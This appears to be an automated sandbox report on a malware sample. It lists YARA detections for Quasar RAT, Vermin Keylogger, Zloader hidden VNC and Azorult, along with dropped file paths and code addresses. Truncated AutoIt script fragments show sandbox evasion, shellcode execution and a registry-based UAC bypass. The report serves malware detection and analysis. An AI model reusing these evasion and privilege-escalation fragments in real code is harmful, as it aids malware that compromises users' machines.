Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: dropped/windef.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth

Binary is likely a compiled AutoIt script file

Show sources

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: This is a third-party compiled AutoIt script.
Source: SystemPropertiesPerformance.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`

AutoIt script contains suspicious strings

Show sources

Source: CVbJSUXraQ.exe	AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: CVbJSUXraQ.exe	AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: CVbJSUXraQ.exe	AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: CVbJSUXraQ.exe	AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: CVbJSUXraQ.exe	AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: CVbJSUXraQ.exe	AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: SystemPropertiesPerformance.exe.1.dr	AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DBE6A0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DBDF00
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DDD975
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DE62D2
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DE6DB6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DDBDA6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DC66E1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DC6F9E
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB104C
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC50BE
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC4C28
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC59EA
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC5554
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADE153
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC5E80
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AC6263
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADD39B
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AD2F13
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C788A0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C694B0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C63C6C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7B420
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C809D4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C72DE0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C76984
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C799B0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C84174
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7DED4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FAD4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7EADC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C766A4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C73A10
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C687CC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C727D4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C803EC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C733EC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C84BE4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C82F5C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6B36C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C68F68
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C78F34
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CA9878
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAA1A4
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CA9D0E
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAAAD0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAAEB3
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CAA63A
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CB7B63
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F12EC4
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F18FCC
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F17482
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC3030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD21C5
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD3187
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD1978
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DDCB21
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD25FA
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD1D90
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC5520
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC5760
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DBDF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A63187
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A4FCE0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A4E6A0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A4DF00
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A53030
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A58808
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A621C5
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6F1D9
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6D975
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A61978
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A41287
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A762D2
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6CB21
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A61484
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A7242E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6BDA6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A76DB6
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A61D90
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A625FA
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00AC7DDB
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A55520
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A566E1
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A56F9E
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A55760

Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process Stats: CPU usage > 98%

Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CVbJSUXraQ.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: CVbJSUXraQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
